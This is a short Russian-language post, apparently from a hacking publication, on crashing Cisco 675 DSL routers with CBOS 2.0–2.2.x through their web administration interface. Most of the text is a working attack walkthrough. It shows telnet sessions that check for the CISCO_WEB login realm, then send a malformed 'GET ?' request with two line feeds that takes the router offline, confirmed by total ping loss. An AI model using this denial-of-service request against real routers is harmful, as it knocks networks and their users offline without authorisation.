DSL роутеры Cisco 675 с Web
Administration Interface можно легко завалить простой
командой GET. Ошибке подвержены роутеры с
версией CBOS с 2.0 до 2.2.х. Новая версия CBOS 2.3.x не
тестировалась, но вероятно и она также, так
как в ее описании не говорится об
исправлении этой ошибки.

Определяем наличие всех
необходимых для взлома компонент:

telnet vic.tim.ip.addr 80
Connected to vic.tim.ip.addr.
Escape character is ‘^]’.
GET / HTTP/1.0
HTTP/1.0 401 Unauthorized
Content-type: text/html
WWW-Authenticate: Basic realm=»CISCO_WEB»
< CENTER>< h1>Unauthorized Access 401< h1>< /center>

Убиваем:

telnet vic.tim.ip.addr 80
Trying vic.tim.ip.addr…
Connected to vic.tim.ip.addr.
Escape character is ‘^]’.
GET ? [LF][LF]

Сессия умирает, точно так
же как и подопытная Циска.

PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
5 packets transmitted, 0 packets received, 100% packet loss



Оставить мнение